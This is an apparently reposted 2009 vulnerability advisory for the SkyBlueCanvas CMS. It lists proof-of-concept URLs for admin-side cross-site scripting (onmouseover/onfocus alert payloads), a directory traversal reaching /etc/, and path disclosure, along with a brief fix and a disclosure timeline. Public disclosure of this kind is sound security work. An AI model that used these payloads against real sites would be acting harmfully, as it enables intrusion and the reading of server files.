SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

2009.06.22

Credit: InterNOT

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-2114 | CVE-2009-2115 | CVE-2009-2116

CWE: CWE-79

SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

Version Affected: 1.1 r237 (newest version: 1.1 r246)

Info: SkyBlueCanvas Lightweight CMS is an open source, free content management system written in php and built specifically for small web sites. The entire site you are viewing is a demonstration of the SkyBlueCanvas lightweight CMS. SkyBlueCanvas is custom-built for those instances when more robust systems like Joomla, WordPress and Drupal are too much horsepower.

Credits: InterN0T

External Links:

http://www.skybluecanvas.com

-:: The Advisory ::-

Vulnerable Function / ID Calls:

mgroup, mgr, objtype, id & dir.

Cross Site Scripting: (requires administrator access - will not survive a login screen)

http://[HOST]/skybluecanvas/admin.php?mgroup=" onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2

http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr=" onmouseover=alert(0) > &com=manager

Impossible XSS: (XML errors or hidden tags preventing use of event handlers.)

http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS

http://[HOST]skybluecanvas/admin.php?mgroup=settings&mgr=configuration&o
bjtype=">XSS

http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page
&sub=editpage&id=" onfocus=alert(0) >

http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS

Path Content Disclosure: (requires admin privileges)

http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../..
/../../../../../etc/

-- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/

--=-- In the above, if One goes to a folder with many subdirectories the above will fail due to a memory allocation flaw.

Path Disclosure: (requires admin privileges)

http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=
media&dir=all&sub=move&id='

http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=
media&dir=all&sub=rename&id='

-:: Solution ::-

Filter event handlers out from function calls.

Conclusion:

Pretty secure system overall but if One is a little inventive, then the above issues might be exploitable.

Reference:

http://forum.intern0t.net/intern0t-advisories/1120-intern0t-skybluecanva
s-1-1-r237-multiple-vulnerabilities.html

Disclosure Information:

- Vulnerabilities found, researched and confirmed between 5th to 10th June.

- Advisory finished and published on InterN0T the 12th June.

- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.

All of the best,

MaXe

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.